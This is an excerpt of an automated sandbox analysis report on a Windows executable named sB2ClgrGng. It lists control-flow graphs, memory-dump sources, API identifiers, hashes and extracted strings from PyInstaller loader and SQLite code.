2003->1982 2004->1975 2011 7ffdfaf5521d-7ffdfaf55228 2007->2011 2012 7ffdfaf5516a-7ffdfaf5516e 2007->2012 2008->1975 2011->2007 2017 7ffdfaf5522e-7ffdfaf55233 2011->2017 2014 7ffdfaf55170-7ffdfaf55182 call 7ffdfaef3750 2012->2014 2015 7ffdfaf551a8-7ffdfaf551b0 2012->2015 2028 7ffdfaf55184-7ffdfaf55189 2014->2028 2029 7ffdfaf5518b-7ffdfaf55193 call 7ffdfaed6c20 2014->2029 2019 7ffdfaf551b2-7ffdfaf551b9 2015->2019 2020 7ffdfaf551c3-7ffdfaf551d6 2015->2020 2017->1962 2019->2020 2024 7ffdfaf551bb-7ffdfaf551be call 7ffdfaeefe80 2019->2024 2021 7ffdfaf551e6-7ffdfaf551f2 2020->2021 2022 7ffdfaf551d8-7ffdfaf551dc 2020->2022 2026 7ffdfaf551f4-7ffdfaf55209 call 7ffdfaf31350 2021->2026 2027 7ffdfaf5520e-7ffdfaf55213 2021->2027 2022->2021 2025 7ffdfaf551de-7ffdfaf551e1 call 7ffdfaeefe50 2022->2025 2024->2020 2025->2021 2026->2027 2027->2011 2034 7ffdfaf55215-7ffdfaf55218 call 7ffdfaef4b40 2027->2034 2028->2029 2033 7ffdfaf55197-7ffdfaf5519a 2028->2033 2029->2033 2033->2017 2038 7ffdfaf551a0 2033->2038 2034->2011 2038->2015
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: database schema is locked: %s$out of memory$statement too long
                                                                                                                                                                                                                                • API String ID: 1405196051-1046679716
                                                                                                                                                                                                                                • Opcode ID: e0e994430da0052bd68193ff13c487c778a35e96c4645b916390733936460a4e
                                                                                                                                                                                                                                • Instruction ID: 145f269ee7470ab63e19b17cc3878949ca190a47e985dfbfa3328536a098d590
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e0e994430da0052bd68193ff13c487c778a35e96c4645b916390733936460a4e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EBF1A726B0C6828AEB289F25D424BBA6B95FF85754F084275EA5E0B7D9CF7CE441C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196597395.00007FFDFAE9F000.00000080.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFA9A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2195444266.00007FFDFA9A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2195488929.00007FFDFA9A1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2195488929.00007FFDFA9B2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2195488929.00007FFDFA9C2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2195488929.00007FFDFA9C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2195488929.00007FFDFAA12000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2195488929.00007FFDFAA27000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2195488929.00007FFDFAA37000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2195488929.00007FFDFAA3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2195488929.00007FFDFAA4C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2195488929.00007FFDFAD10000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2195488929.00007FFDFAD12000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2195488929.00007FFDFAD49000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2195488929.00007FFDFAD86000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2195488929.00007FFDFADE1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2195488929.00007FFDFAE51000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2195488929.00007FFDFAE86000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2195488929.00007FFDFAE99000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196648212.00007FFDFAEA0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfa9a0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3300690313-0
                                                                                                                                                                                                                                • Opcode ID: 9303a6f8cfca9bd28e22bda977947a27f0d72090a782595ff5d89924e4e259ae
                                                                                                                                                                                                                                • Instruction ID: d4f9912b68b738525de7f0d6c26e2325133358e944bae9f42a96627a0735db57
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9303a6f8cfca9bd28e22bda977947a27f0d72090a782595ff5d89924e4e259ae
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7762496272829286E7199F38D4106BD77A0F748789F049532EAAFC37C8E67DEA45C710
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: :memory:
                                                                                                                                                                                                                                • API String ID: 1405196051-2920599690
                                                                                                                                                                                                                                • Opcode ID: bf70d77afc01cbf19fbbe77a6fbb5ad5d6fb6116ce59a44bb9ab07591d1fa7c8
                                                                                                                                                                                                                                • Instruction ID: beaa72aba430e20e05eeaac11449921b0d7f6854623447f92460835291bf8a0b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf70d77afc01cbf19fbbe77a6fbb5ad5d6fb6116ce59a44bb9ab07591d1fa7c8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9428461B097C386FB68AB259464B7927A0FF85B84F084175CE6E477E9DF3EE4948300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                                                                                • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                • Instruction ID: 3130ba89440e5f17199f01b0e4791b374f000c21622634472f1aacc44fbfb46c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64F04422B1C6418AF760BB64B8DA7667350BB84764F040235DE7D42AD8DF3CD0498A04
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InfoSystem
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 31276548-0
                                                                                                                                                                                                                                • Opcode ID: 7e95180d38cd00ed8df76aa16efa4cdac9e9adb77db5b2022ed37012a1f49ff9
                                                                                                                                                                                                                                • Instruction ID: afd8f80621615718abb468f3823b17b4901be5edb124c7d09f619f64b40a95a4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e95180d38cd00ed8df76aa16efa4cdac9e9adb77db5b2022ed37012a1f49ff9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EDA1ED60F0BB4785FF689B45A8B4B782290BF56740F5A05B5CD3E567E8DF2EA8D09300

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 269 7ff644871950-7ff64487198b call 7ff6448745c0 272 7ff644871991-7ff6448719d1 call 7ff644877f90 269->272 273 7ff644871c4e-7ff644871c72 call 7ff64487c550 269->273 278 7ff644871c3b-7ff644871c3e call 7ff64488004c 272->278 279 7ff6448719d7-7ff6448719e7 call 7ff6448806d4 272->279 282 7ff644871c43-7ff644871c4b 278->282 284 7ff644871a08-7ff644871a24 call 7ff64488039c 279->284 285 7ff6448719e9-7ff644871a03 call 7ff644884f08 call 7ff644872910 279->285 282->273 291 7ff644871a26-7ff644871a40 call 7ff644884f08 call 7ff644872910 284->291 292 7ff644871a45-7ff644871a5a call 7ff644884f28 284->292 285->278 291->278 298 7ff644871a5c-7ff644871a76 call 7ff644884f08 call 7ff644872910 292->298 299 7ff644871a7b-7ff644871afc call 7ff644871c80 * 2 call 7ff6448806d4 292->299 298->278 311 7ff644871b01-7ff644871b14 call 7ff644884f44 299->311 314 7ff644871b16-7ff644871b30 call 7ff644884f08 call 7ff644872910 311->314 315 7ff644871b35-7ff644871b4e call 7ff64488039c 311->315 314->278 321 7ff644871b50-7ff644871b6a call 7ff644884f08 call 7ff644872910 315->321 322 7ff644871b6f-7ff644871b8b call 7ff644880110 315->322 321->278 329 7ff644871b8d-7ff644871b99 call 7ff644872710 322->329 330 7ff644871b9e-7ff644871bac 322->330 329->278 330->278 331 7ff644871bb2-7ff644871bb9 330->331 335 7ff644871bc1-7ff644871bc7 331->335 336 7ff644871bc9-7ff644871bd6 335->336 337 7ff644871be0-7ff644871bef 335->337 338 7ff644871bf1-7ff644871bfa 336->338 337->337 337->338 339 7ff644871bfc-7ff644871bff 338->339 340 7ff644871c0f 338->340 339->340 341 7ff644871c01-7ff644871c04 339->341 342 7ff644871c11-7ff644871c24 340->342 341->340 343 7ff644871c06-7ff644871c09 341->343 344 7ff644871c2d-7ff644871c39 342->344 345 7ff644871c26 342->345 343->340 346 7ff644871c0b-7ff644871c0d 343->346 344->278 344->335 345->344 346->342
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644877F90: _fread_nolock.LIBCMT ref: 00007FF64487803A
                                                                                                                                                                                                                                • _fread_nolock.LIBCMT ref: 00007FF644871A1B
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644872910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF644871B6A), ref: 00007FF64487295E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                • Opcode ID: ee3080450604db9b79bcaf6ea9780d01564dfb64de786eed8711188a6f6cabc7
                                                                                                                                                                                                                                • Instruction ID: c8e74e29ab882016d0b012d010cee4df9487ba3c87560a8a27fd1fd941d9d4a7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee3080450604db9b79bcaf6ea9780d01564dfb64de786eed8711188a6f6cabc7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0816F71B0CA868DEB60FB1498D26B96390EF84785F444435DD8DC7B8EDE3DE5858740

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                • Opcode ID: 36c27e05a3dc08856ce095ca55667838a030721a896d1c10063586a41b75456c
                                                                                                                                                                                                                                • Instruction ID: f54d446251908911f64f5b2f4d617ffb33ebb7b5daef46f80cba576e1df611c2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36c27e05a3dc08856ce095ca55667838a030721a896d1c10063586a41b75456c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B416022B1C6428EEB14FB2198925B96390FF84B94F444536ED4D97B9EEF3CE501C704

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 678 7ffdfaf544f0-7ffdfaf545b4 call 7ffdfaf541f0 681 7ffdfaf545ba-7ffdfaf545d8 678->681 682 7ffdfaf54966-7ffdfaf54969 678->682 683 7ffdfaf545f2-7ffdfaf545f6 681->683 684 7ffdfaf545da-7ffdfaf545ed 681->684 685 7ffdfaf54973-7ffdfaf54976 call 7ffdfaed6c20 682->685 686 7ffdfaf5496b-7ffdfaf54971 682->686 688 7ffdfaf54606-7ffdfaf54612 683->688 689 7ffdfaf545f8-7ffdfaf545ff 683->689 687 7ffdfaf5498f-7ffdfaf549ae call 7ffdfb002bc0 684->687 690 7ffdfaf5497b-7ffdfaf54981 call 7ffdfaf31350 685->690 686->685 686->690 693 7ffdfaf54614-7ffdfaf54618 688->693 694 7ffdfaf5461e-7ffdfaf54622 688->694 689->688 692 7ffdfaf54601 call 7ffdfaeefe80 689->692 702 7ffdfaf54986-7ffdfaf54988 690->702 692->688 693->694 699 7ffdfaf5469b-7ffdfaf546a6 693->699 700 7ffdfaf54624-7ffdfaf54628 694->700 701 7ffdfaf5462a-7ffdfaf5462f call 7ffdfaef3750 694->701 704 7ffdfaf546b0-7ffdfaf546c7 call 7ffdfaefd640 699->704 700->701 703 7ffdfaf54698 700->703 706 7ffdfaf54634-7ffdfaf54638 701->706 702->687 703->699 710 7ffdfaf546c9-7ffdfaf546d1 704->710 706->703 709 7ffdfaf5463a-7ffdfaf54647 call 7ffdfaf929e0 706->709 715 7ffdfaf5467e-7ffdfaf54685 709->715 716 7ffdfaf54649 709->716 712 7ffdfaf546d3-7ffdfaf546dc 710->712 713 7ffdfaf546de 710->713 717 7ffdfaf546e1-7ffdfaf546ef 712->717 713->717 721 7ffdfaf5468f-7ffdfaf54693 715->721 722 7ffdfaf54687-7ffdfaf5468a call 7ffdfaed63e0 715->722 718 7ffdfaf54650-7ffdfaf54659 716->718 719 7ffdfaf547a5 717->719 720 7ffdfaf546f5-7ffdfaf546f8 717->720 718->718 723 7ffdfaf5465b-7ffdfaf5466d call 7ffdfaed6860 718->723 726 7ffdfaf547aa-7ffdfaf547bd 719->726 724 7ffdfaf546fa-7ffdfaf546ff 720->724 725 7ffdfaf54735-7ffdfaf5473b 720->725 728 7ffdfaf54949-7ffdfaf54951 721->728 722->721 723->715 749 7ffdfaf5466f-7ffdfaf54679 00007FFE148D2010 723->749 724->725 732 7ffdfaf54701-7ffdfaf54716 724->732 725->719 735 7ffdfaf5473d-7ffdfaf54750 call 7ffdfaed6860 725->735 733 7ffdfaf547f3-7ffdfaf54806 726->733 734 7ffdfaf547bf-7ffdfaf547c4 726->734 729 7ffdfaf54953-7ffdfaf54957 728->729 730 7ffdfaf5495e-7ffdfaf54964 728->730 729->730 739 7ffdfaf54959 call 7ffdfaeefe50 729->739 730->682 730->702 740 7ffdfaf5472b-7ffdfaf54733 call 7ffdfaf3a8e0 732->740 741 7ffdfaf54718-7ffdfaf5471b 732->741 736 7ffdfaf5480c-7ffdfaf54814 733->736 737 7ffdfaf54808 733->737 742 7ffdfaf547d6-7ffdfaf547dd 734->742 743 7ffdfaf547c6-7ffdfaf547cb 734->743 755 7ffdfaf54752-7ffdfaf54783 735->755 756 7ffdfaf54786-7ffdfaf5478d 735->756 746 7ffdfaf5485c-7ffdfaf5485e 736->746 747 7ffdfaf54816-7ffdfaf54829 call 7ffdfaed6860 736->747 737->736 739->730 740->726 741->740 750 7ffdfaf5471d-7ffdfaf5471f 741->750 754 7ffdfaf547e0-7ffdfaf547ee call 7ffdfaef2e10 742->754 752 7ffdfaf547d4 743->752 753 7ffdfaf547cd-7ffdfaf547d2 743->753 759 7ffdfaf54860-7ffdfaf54864 746->759 760 7ffdfaf5486b-7ffdfaf548d9 call 7ffdfaed9160 call 7ffdfaf4d030 746->760 770 7ffdfaf54842-7ffdfaf54849 747->770 771 7ffdfaf5482b-7ffdfaf5483d 747->771 749->715 750->740 758 7ffdfaf54721-7ffdfaf54726 750->758 752->742 753->754 754->733 755->756 763 7ffdfaf5478f-7ffdfaf54792 call 7ffdfaed63e0 756->763 764 7ffdfaf54797-7ffdfaf547a0 756->764 766 7ffdfaf5493a-7ffdfaf5493e 758->766 759->760 767 7ffdfaf54866 759->767 780 7ffdfaf548db-7ffdfaf548e1 call 7ffdfaed63e0 760->780 781 7ffdfaf548e6-7ffdfaf548e8 760->781 763->764 764->766 766->728 769 7ffdfaf54940-7ffdfaf54944 call 7ffdfaef4b40 766->769 767->760 769->728 776 7ffdfaf54853-7ffdfaf54857 770->776 777 7ffdfaf5484b-7ffdfaf5484e call 7ffdfaed63e0 770->777 771->770 776->766 777->776 780->781 783 7ffdfaf548ea-7ffdfaf548f0 call 7ffdfaf2e560 781->783 784 7ffdfaf548f5-7ffdfaf548f9 781->784 783->784 786 7ffdfaf54912-7ffdfaf54914 784->786 787 7ffdfaf548fb-7ffdfaf54910 call 7ffdfaf313e0 784->787 789 7ffdfaf54925-7ffdfaf54935 786->789 790 7ffdfaf54916-7ffdfaf5491e 786->790 787->766 789->766 790->766 792 7ffdfaf54920-7ffdfaf54923 790->792 792->766 792->789
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text)$SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master$table
                                                                                                                                                                                                                                • API String ID: 1405196051-879093740
                                                                                                                                                                                                                                • Opcode ID: d4fad8ce603d4af39c9e6f619e9efd64ec527290160208fa6c2a8eec203bd489
                                                                                                                                                                                                                                • Instruction ID: 4560f4945ac1dfb30786702901fbb8c474d1f30571f1a870fd867b75002988bb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d4fad8ce603d4af39c9e6f619e9efd64ec527290160208fa6c2a8eec203bd489
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26E1BF22F0C7828AEB18CB259060ABD27A2FF457A9F054275EE6D1B7D9DF38E451C340

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 793 7ff644871210-7ff64487126d call 7ff64487bd80 796 7ff644871297-7ff6448712af call 7ff644884f44 793->796 797 7ff64487126f-7ff644871296 call 7ff644872710 793->797 802 7ff6448712d4-7ff6448712e4 call 7ff644884f44 796->802 803 7ff6448712b1-7ff6448712cf call 7ff644884f08 call 7ff644872910 796->803 809 7ff644871309-7ff64487131b 802->809 810 7ff6448712e6-7ff644871304 call 7ff644884f08 call 7ff644872910 802->810 816 7ff644871439-7ff64487146d call 7ff64487ba60 call 7ff644884f30 * 2 803->816 812 7ff644871320-7ff644871345 call 7ff64488039c 809->812 810->816 822 7ff64487134b-7ff644871355 call 7ff644880110 812->822 823 7ff644871431 812->823 822->823 829 7ff64487135b-7ff644871367 822->829 823->816 831 7ff644871370-7ff644871398 call 7ff64487a1c0 829->831 834 7ff64487139a-7ff64487139d 831->834 835 7ff644871416-7ff64487142c call 7ff644872710 831->835 836 7ff644871411 834->836 837 7ff64487139f-7ff6448713a9 834->837 835->823 836->835 839 7ff6448713ab-7ff6448713b9 call 7ff644880adc 837->839 840 7ff6448713d4-7ff6448713d7 837->840 844 7ff6448713be-7ff6448713c1 839->844 842 7ff6448713ea-7ff6448713ef 840->842 843 7ff6448713d9-7ff6448713e7 call 7ff644899e30 840->843 842->831 846 7ff6448713f5-7ff6448713f8 842->846 843->842 847 7ff6448713c3-7ff6448713cd call 7ff644880110 844->847 848 7ff6448713cf-7ff6448713d2 844->848 850 7ff64487140c-7ff64487140f 846->850 851 7ff6448713fa-7ff6448713fd 846->851 847->842 847->848 848->835 850->823 851->835 853 7ff6448713ff-7ff644871407 851->853 853->812
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
